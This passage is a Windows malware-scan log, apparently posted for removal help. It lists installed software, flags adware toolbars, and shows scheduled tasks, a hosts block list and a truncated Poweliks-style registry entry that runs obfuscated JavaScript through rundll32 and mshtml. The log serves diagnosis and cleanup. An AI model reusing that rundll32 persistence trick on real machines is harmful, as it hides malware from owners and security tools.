(HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc) Dell Getting Started Guide (HKLM-x32\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.) DesignPro 5 (HKLM-x32\...\InstallShield_{32821558-2C36-4FD0-A891-CA65360B0EC7}) (Version: 5.5.708 - Avery Dennison) DesignPro 5 (x32 Version: 5.5.708 - Avery Dennison) Hidden DirectXInstallService (x32 Version: 9.0.2 - Roxio) Hidden DocProc (x32 Version: 140.0.99.000 - Hewlett-Packard) Hidden Dolby Digital Live Pack (HKLM-x32\...\Dolby Digital Live Pack) (Version: 3.00 - Creative Technology Limited) Doxillion Document Converter (HKLM-x32\...\Doxillion) (Version: 2.17 - NCH Software) EMC 10 Content (x32 Version: 1.0.035 - Roxo, Inc.) Hidden EMCGadgets64 (Version: 1.0.302 - Sonic) Hidden ffdshow [rev 2527] [2008-12-19] (HKLM-x32\...\ffdshow_is1) (Version: 1.0 - ) FirstClass® Client (HKLM-x32\...\{5B35C417-2649-11D6-83D1-0050FC01225C}) (Version: 10.0 (build 10.009) - FirstClass Division, Open Text Corporation.) Fitbit Connect (HKLM-x32\...\{D3CD091B-296B-48E9-9F0F-E9FE53E02E41}) (Version: 1.0.3.5511 - Fitbit Inc.) Garmin USB Drivers (HKLM-x32\...\{510D2239-6C2E-457B-9590-485EC552D94D}) (Version: 2.3.0.0 - Garmin Ltd or its subsidiaries) Garmin WebUpdater (HKLM-x32\...\{6C94A234-CA2C-4D3C-81E6-6AAA8069825D}) (Version: 2.5.5 - Garmin Ltd or its subsidiaries) Google Chrome (HKCU\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.) Google Earth (HKLM-x32\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google) Google Earth (HKLM-x32\...\{C768790F-04FB-11E0-9B2C-001AA037B01E}) (Version: 6.0.1.2032 - Google) Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.) Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden Hewlett-Packard ACLM.NET v1.1.0.0 (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard) HP Officejet Pro 8600 Basic Device Software (HKLM\...\{2D5E3D2B-919F-407C-8757-E64827518BB6}) (Version: 25.0.619.0 - Hewlett-Packard Co.) HP Officejet Pro 8600 Help (HKLM-x32\...\{B6F5C6D8-C443-4B55-932F-AE11B5743FC4}) (Version: 140.0.2.2 - Hewlett Packard) HP Officejet Pro 8600 Product Improvement Study (HKLM\...\{F792E5B0-11C4-4C68-8A63-FB5F52749180}) (Version: 25.0.619.0 - Hewlett-Packard Co.) HP Product Detection (HKLM-x32\...\{A436F67F-687E-4736-BD2B-537121A804CF}) (Version: 11.14.0001 - HP) HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) HPDiagnosticAlert (x32 Version: 1.00.0000 - Microsoft) Hidden I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP) iCloud (HKLM\...\{81E20D41-C277-4526-934D-F2380AF91B78}) (Version: 3.1.0.40 - Apple Inc.) Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version: - Intel Corporation) Internet TV for Windows Media Center (HKLM-x32\...\{9D318C86-AF4C-409F-A6AC-7183FF4CF424}) (Version: 4.2.2.0 - Microsoft Corporation) iTunes (HKLM\...\{77DE5105-D05E-448C-96CB-7FA381903753}) (Version: 11.3.1.2 - Apple Inc.) Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle) Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation) Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation) MapsGalaxy Toolbar (HKLM-x32\...\MapsGalaxy_39bar Uninstall) (Version: - Mindspark Interactive Network) <==== ATTENTION McAfee AntiVirus (HKLM-x32\...\MSC) (Version: 12.8.988 - McAfee, Inc.) McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.130.10 - McAfee, Inc.) Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation) Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.7015.1000 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable - KB2467175 (HKLM-x32\...\{a0fe116e-9a8a-466f-aee0-625cb7c207e3}) (Version: 8.0.51011 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM-x32\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{820B6609-4C97-3A2B-B644-573B06A0F0CC}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation) MP3 Rocket (HKLM-x32\...\MP3 Rocket) (Version: - ) MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.) OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP) OpenAL (HKLM-x32\...\OpenAL) (Version: - ) Photomatix Pro version 4.0.1 (HKLM\...\PhotomatixPro4.0x64_is1) (Version: 4.0.1 - HDRsoft Sarl) PowerDVD DX (HKLM-x32\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version: 8.3.6029 - CyberLink Corp.) QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5951 - Realtek Semiconductor Corp.) Roxio Easy CD and DVD Burning (HKLM-x32\...\{537BF16E-7412-448C-95D8-846E85A1D817}) (Version: 10.3 - Roxio) Roxio File Backup (Version: 1.3.0 - Roxio) Hidden Sansa Updater (HKCU\...\Sansa Updater) (Version: - ) Savings Bond Wizard (HKLM-x32\...\Savings Bond Wizard) (Version: - ) <==== ATTENTION Search-Results Toolbar (HKLM-x32\...\searchresultstb) (Version: 1.0.0.13 - APN, LLC) <==== ATTENTION Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft) Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee) Skins (x32 Version: 2009.1209.2335.42329 - ATI) Hidden Sonic CinePlayer Decoder Pack (x32 Version: 4.3.0 - Sonic Solutions) Hidden Sound Blaster X-Fi (HKLM-x32\...\{20288888-A7AF-4B24-8AEB-398D20CD563C}) (Version: 1.0 - ) SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 5.0.1142 - SUPERAntiSpyware.com) Switch Sound File Converter (HKLM-x32\...\Switch) (Version: - NCH Software) TurboTax 2010 (HKLM-x32\...\TurboTax 2010) (Version: - Intuit, Inc) TurboTax 2011 (HKLM-x32\...\TurboTax 2011) (Version: - Intuit, Inc) TurboTax 2012 (HKLM-x32\...\TurboTax 2012) (Version: 2012.0 - Intuit, Inc) TurboTax 2013 (HKLM-x32\...\TurboTax 2013) (Version: 2013.0 - Intuit, Inc) TWC Customer Controls (HKLM-x32\...\{A2E5F2AA-2996-41EA-BCCD-9FD0476A5326}) (Version: 11 - SupportSoft) VD64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden Verizon Cloud (HKLM-x32\...\Verizon Cloud) (Version: - Verizon Wireless) WavePad Sound Editor (HKLM-x32\...\WavePad) (Version: 5.96 - NCH Software) WebEx (HKLM-x32\...\ActiveTouchMeetingClient) (Version: - WebEx Communications, Inc) Window Shopper (HKLM-x32\...\{A1570454-ED12-4050-A7AC-9282C7AFB23C}) (Version: 01.02.0003 - Superfish) Windows 7 Upgrade Advisor (HKLM-x32\...\{AB05F2C8-F608-403b-95E1-FD8ADFACD31E}) (Version: 2.0.5000.0 - Microsoft Corporation) Windows Driver Package - Garmin (grmnusb) GARMIN Devices (06/03/2009 2.3.0.0) (HKLM\...\49CF605F02C7954F4E139D18828DE298CD59217C) (Version: 06/03/2009 2.3.0.0 - Garmin) Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation) Windows Live Sync (HKLM-x32\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation) ==================== Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) CustomCLSID: HKU\S-1-5-21-1776543140-210536247-3466770518-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Gary\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.) CustomCLSID: HKU\S-1-5-21-1776543140-210536247-3466770518-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? CustomCLSID: HKU\S-1-5-21-1776543140-210536247-3466770518-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Gary\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.) ==================== Restore Points ========================= 30-10-2014 22:05:07 avast! antivirus system restore point 01-11-2014 00:42:11 Restore Operation ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 22:34 - 2014-05-31 07:39 - 00450712 ____R C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 [url="http://www.007guard.com"]www.007guard.com[/url] 127.0.0.1 007guard.com 127.0.0.1 008i.com 127.0.0.1 [url="http://www.008k.com"]www.008k.com[/url] 127.0.0.1 008k.com 127.0.0.1 [url="http://www.00hq.com"]www.00hq.com[/url] 127.0.0.1 00hq.com 127.0.0.1 010402.com 127.0.0.1 [url="http://www.032439.com"]www.032439.com[/url] 127.0.0.1 032439.com 127.0.0.1 [url="http://www.0scan.com"]www.0scan.com[/url] 127.0.0.1 0scan.com 127.0.0.1 [url="http://www.1000gratisproben.com"]www.1000gratisproben.com[/url] 127.0.0.1 1000gratisproben.com 127.0.0.1 1001namen.com 127.0.0.1 [url="http://www.1001namen.com"]www.1001namen.com[/url] 127.0.0.1 100888290cs.com 127.0.0.1 [url="http://www.100888290cs.com"]www.100888290cs.com[/url] 127.0.0.1 [url="http://www.100sexlinks.com"]www.100sexlinks.com[/url] 127.0.0.1 100sexlinks.com 127.0.0.1 [url="http://www.10sek.com"]www.10sek.com[/url] 127.0.0.1 10sek.com 127.0.0.1 [url="http://www.1-2005-search.com"]www.1-2005-search.com[/url] 127.0.0.1 1-2005-search.com 127.0.0.1 [url="http://www.123fporn.info"]www.123fporn.info[/url] 127.0.0.1 123fporn.info 127.0.0.1 123haustiereundmehr.com 127.0.0.1 [url="http://www.123haustiereundmehr.com"]www.123haustiereundmehr.com[/url] 127.0.0.1 123moviedownload.com There are 1000 more lines. ==================== Scheduled Tasks (whitelisted) ============= (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.) Task: {0D0E0C78-9085-40BB-9DA1-A6A311F4D754} - System32\Tasks\Adobe online update program => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-09-12] (Adobe Systems Incorporated) Task: {10B76274-0B0F-4BF7-AE23-BB45807086D3} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1005Core => C:\Users\Katie\AppData\Local\Google\Update\GoogleUpdate.exe [2012-12-11] (Google Inc.) Task: {128364DF-62BE-4496-BEB4-85764F5AA041} - System32\Tasks\{FD57F41E-8A42-4069-9428-1FD82EC3FB76} => C:\Program Files (x86)\Corel\Corel Paint Shop Pro Photo X2\Corel Paint Shop Pro Photo.exe [2008-08-08] (Corel, Inc.) Task: {15CCFE83-71ED-418C-9FE9-71BC632A6131} - System32\Tasks\Google Updater and Installer => C:\Users\Gary\AppData\Local\Google\Update\GoogleUpdate.exe [2014-10-17] (Google Inc.) Task: {1A531B50-031F-4627-AAA2-FC13F3AB3582} - System32\Tasks\NCH Software\switchShakeIcon => C:\Program Files (x86)\NCH Software\Switch\Switch.exe [2011-10-09] (NCH Software) Task: {23CC0D78-3019-46FB-B34A-FE9C3BF72769} - System32\Tasks\Microsoft\Windows\WindowsBackup\AutomaticBackup => Rundll32.exe /d sdengin2.dll,ExecuteScheduledBackup Task: {3F1009F2-451C-4EC2-AD21-7C6C7E974E39} - System32\Tasks\{1F5BD0A3-4C6E-4DB9-A9E8-80266B488190} => C:\WINDOWS\System32\java.exe Task: {4757BA1B-4F91-4EEB-B072-3A957CE77D7E} - System32\Tasks\{F982F545-47C2-40EE-912E-65F95C9A4ED5} => C:\WINDOWS\System32\java.exe Task: {53684FEC-2B33-4D35-95A8-8745D0199D2E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-18] (Google Inc.) Task: {5A4177EC-C0E5-4B28-AAEB-82F2A2CF089E} - System32\Tasks\Java Update Scheduler => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2014-10-07] (Oracle Corporation) Task: {5EE44160-D04C-4E48-B6F1-8C7520C77E3C} - System32\Tasks\{9CEA4C11-4B96-4D0F-A1D9-2900B4D241D4} => C:\Program Files (x86)\iTunes\iTunes.exe [2014-08-01] (Apple Inc.) Task: {6027B904-86DE-4514-8EDD-81BBE9E02EEA} - System32\Tasks\WebReg HP Photosmart Prem C410 series => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqwrg.exe Task: {66B15493-FFA5-40E9-8C8B-3C3F05AC7C10} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\My Dell\uaclauncher.exe [2014-01-31] (PC-Doctor, Inc.) Task: {6EB758DD-C293-4AEF-9AA6-86B3EC444F28} - System32\Tasks\{345D9C9E-DF51-4F9A-82F4-B6A0F9F6FCCB} => C:\WINDOWS\System32\java.exe Task: {6FA4C38B-436F-4E1E-BDC1-60407E224988} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1000Core1cf4afcedbeedb2 => C:\Users\Gary\AppData\Local\Google\Update\GoogleUpdate.exe [2014-10-17] (Google Inc.) Task: {70836A92-C637-46B1-AA2B-D4AB80CE3DEF} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-31] (PC-Doctor, Inc.) Task: {81CD3D09-2CF9-4E5C-96FF-BF090BB45573} - System32\Tasks\{53ECF6AF-7FB1-409F-8B6A-68B00AEF0EBF} => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.) Task: {81F60316-9CC2-435E-9BF0-6CA46BE59142} - System32\Tasks\{C5046DCB-B2CF-4243-901A-1B4DBF26E0AB} => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.) Task: {9158DE37-1BE6-4DB4-90C8-8216F2C4EFCD} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1000UA => C:\Users\Gary\AppData\Local\Facebook\Update\FacebookUpdate.exe Task: {9552F2B6-4299-41BD-B5B3-0216BC564864} - System32\Tasks\{D2328B8F-70B9-402A-9F1A-8CDF4912E31A} => C:\WINDOWS\System32\java.exe Task: {986D2D3D-1C63-4A00-ACF3-3B9C30D34AC5} - System32\Tasks\CCleanerSkipUAC => C:\Program Files (x86)\CCleaner\CCleaner.exe [2014-10-23] (Piriform Ltd) Task: {9CF3354F-CECF-476D-9877-3A7F5E4F370A} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1000Core => C:\Users\Gary\AppData\Local\Facebook\Update\FacebookUpdate.exe Task: {A09CC7B8-8AFF-4775-9AAF-A399841E7F0D} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe Task: {B79108A1-CB55-46B5-97F0-9ADAD5D46EBA} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1005UA => C:\Users\Katie\AppData\Local\Google\Update\GoogleUpdate.exe [2012-12-11] (Google Inc.) Task: {BA1A4C2F-2F90-4A06-A751-AEE5C96C1562} - System32\Tasks\HPCustParticipation HP Officejet Pro 8600 => C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPCustPartic.exe [2011-09-09] (Hewlett-Packard Co.) Task: {C751AE6A-6034-41E0-AD7A-22F5E0F13739} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1000UA1cf23a95ab00a5d => C:\Users\Gary\AppData\Local\Google\Update\GoogleUpdate.exe [2014-10-17] (Google Inc.) Task: {D5986A94-AA73-4F43-9286-4D500277077F} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.) Task: {D78D5F68-12A0-4EAF-9EFA-A879F7FA34ED} - System32\Tasks\{D97670EA-AD07-4CB1-A8DC-2110A8AED5D5} => C:\WINDOWS\System32\java.exe Task: {DC9A6A02-E5EC-4CAC-95EF-8E0D78F46005} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-18] (Google Inc.) Task: {EB0DCF51-762B-4E1E-ACFC-D3C3AE1E1C8D} - System32\Tasks\Sansa Dispatch => C:\Users\Gary\AppData\Roaming\SanDisk\Sansa Updater\SansaDispatch.exe [2014-04-28] (SanDisk Corporation) Task: {EBC50E33-3B6F-4DB4-97D5-05504B8287A1} - System32\Tasks\vtscheduletask => C:\Program Files (x86)\McAfee\Supportability\MVT\MvtApp.exe Task: {EC5C1974-86DC-4E84-93A2-7DF18178491B} - System32\Tasks\{8C5F56B2-3456-4F9C-94FB-9511ADF34262} => C:\Program Files (x86)\iTunes\iTunes.exe [2014-08-01] (Apple Inc.) Task: {F0134E16-4337-4727-A626-62B24A15A4E7} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-23] (Adobe Systems Incorporated) Task: {F518FED8-1C23-49F3-B5CC-61C7AD23EA47} - System32\Tasks\HP online update program => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [2013-05-30] (Hewlett-Packard) Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1000Core.job => C:\Users\Gary\AppData\Local\Facebook\Update\FacebookUpdate.exe Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1000UA.job => C:\Users\Gary\AppData\Local\Facebook\Update\FacebookUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1000Core1cf4afcedbeedb2.job => C:\Users\Gary\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1000UA1cf23a95ab00a5d.job => C:\Users\Gary\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1005Core.job => C:\Users\Katie\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1005UA.job => C:\Users\Katie\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\vtscheduletask.job => C:\Program Files (x86)\McAfee\Supportability\MVT\MvtApp.exe ==================== Loaded Modules (whitelisted) ============= 2007-06-05 14:20 - 2007-06-05 14:20 - 00177704 ____N () C:\Windows\SysWOW64\PSIService.exe 2013-09-05 01:17 - 2013-09-05 01:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF 2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll 2010-04-24 00:47 - 2011-08-18 11:05 - 02751808 _____ () C:\Program Files (x86)\Dell DataSafe Local Backup\COMPONENTS\SCHEDULER\STSERVICE.EXE 2014-06-15 08:56 - 2014-06-15 08:56 - 19752256 _____ () C:\Program Files\Verizon Cloud\Verizon Cloud Service.exe 2014-06-15 08:35 - 2014-06-15 08:35 - 00160256 _____ () C:\Program Files\Verizon Cloud\libexpat.dll 2014-06-15 08:36 - 2014-06-15 08:36 - 15655424 _____ () C:\Program Files\Verizon Cloud\avcodec-54.dll 2014-06-15 08:36 - 2014-06-15 08:36 - 00217600 _____ () C:\Program Files\Verizon Cloud\avutil-51.dll 2014-06-15 08:36 - 2014-06-15 08:36 - 03004928 _____ () C:\Program Files\Verizon Cloud\avformat-54.dll 2014-06-15 08:36 - 2014-06-15 08:36 - 00347648 _____ () C:\Program Files\Verizon Cloud\swscale-2.dll 2014-10-15 03:52 - 2014-10-15 03:52 - 00472576 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_64\VistaBridgeLibrary\c29d8779b3a3599f44e21e017541cd0c\VistaBridgeLibrary.ni.dll 2008-08-08 18:30 - 2008-08-08 18:30 - 00016712 ____R () C:\Program Files (x86)\Corel\Corel Paint Shop Pro Photo X2\CorelIOMonitor.exe 2014-02-06 01:52 - 2014-02-06 01:52 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll 2014-02-06 01:52 - 2014-02-06 01:52 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll 2011-01-20 06:25 - 2011-01-20 06:25 - 00854016 _____ () C:\Windows\assembly\GAC_32\System.Data.SQLite\1.0.61.0__db937bc2d44ff139\System.Data.SQLite.dll 2011-01-20 06:25 - 2011-01-20 06:25 - 00476520 _____ () C:\Windows\assembly\GAC_MSIL\Intuit.Spc.Map.Reporter\5.0.136.0__7ce6deabcb36a8ea\Intuit.Spc.Map.Reporter.dll 2013-09-14 01:51 - 2013-09-14 01:51 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Internet Services\zlib1.dll 2013-09-14 01:50 - 2013-09-14 01:50 - 01242952 _____ () C:\Program Files (x86)\Common Files\Apple\Internet Services\libxml2.dll 2010-04-24 00:42 - 2009-02-06 18:52 - 00073728 _____ () C:\Windows\SysWOW64\CmdRtr.DLL 2010-04-24 00:42 - 2009-06-29 10:54 - 00164864 _____ () C:\Windows\SysWOW64\APOMngr.DLL 2010-07-07 12:33 - 2010-07-07 12:33 - 00002560 _____ () C:\Windows\SysWOW64\CTXFIRES.DLL 2011-03-07 21:25 - 2001-08-23 20:00 - 01388544 _____ () C:\Program Files (x86)\AML Products\Registry Cleaner\MSVBVM60.DLL 2011-03-07 21:25 - 2009-10-29 17:10 - 00615424 _____ () C:\Program Files (x86)\AML Products\Registry Cleaner\Styles\Office2007.cjstyles 2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF 2010-10-20 15:45 - 2010-10-20 15:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll 2014-11-01 01:21 - 2014-10-22 00:04 - 01042760 _____ () C:\Users\Gary\AppData\Local\Google\Chrome\Application\38.0.2125.111\libglesv2.dll 2014-11-01 01:21 - 2014-10-22 00:04 - 00211272 _____ () C:\Users\Gary\AppData\Local\Google\Chrome\Application\38.0.2125.111\libegl.dll 2014-11-01 01:21 - 2014-10-22 00:04 - 08910664 _____ () C:\Users\Gary\AppData\Local\Google\Chrome\Application\38.0.2125.111\pdf.dll 2014-11-01 01:21 - 2014-10-22 00:04 - 01681224 _____ () C:\Users\Gary\AppData\Local\Google\Chrome\Application\38.0.2125.111\ffmpegsumo.dll ==================== Alternate Data Streams (whitelisted) ========= (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.) AlternateDataStreams: C:\ProgramData\TEMP:D1B5B4F1 ==================== Safe Mode (whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\atashost => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SprtListen => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SprtListenPush => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SupportSoft RemoteAssist => ""="Service" ==================== EXE Association (whitelisted) ============= (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.) ==================== MSCONFIG/TASK MANAGER disabled items ========= (Currently there is no automatic fix for this section.) ========================= Accounts: ========================== Administrator (S-1-5-21-1776543140-210536247-3466770518-500 - Administrator - Disabled) Gary 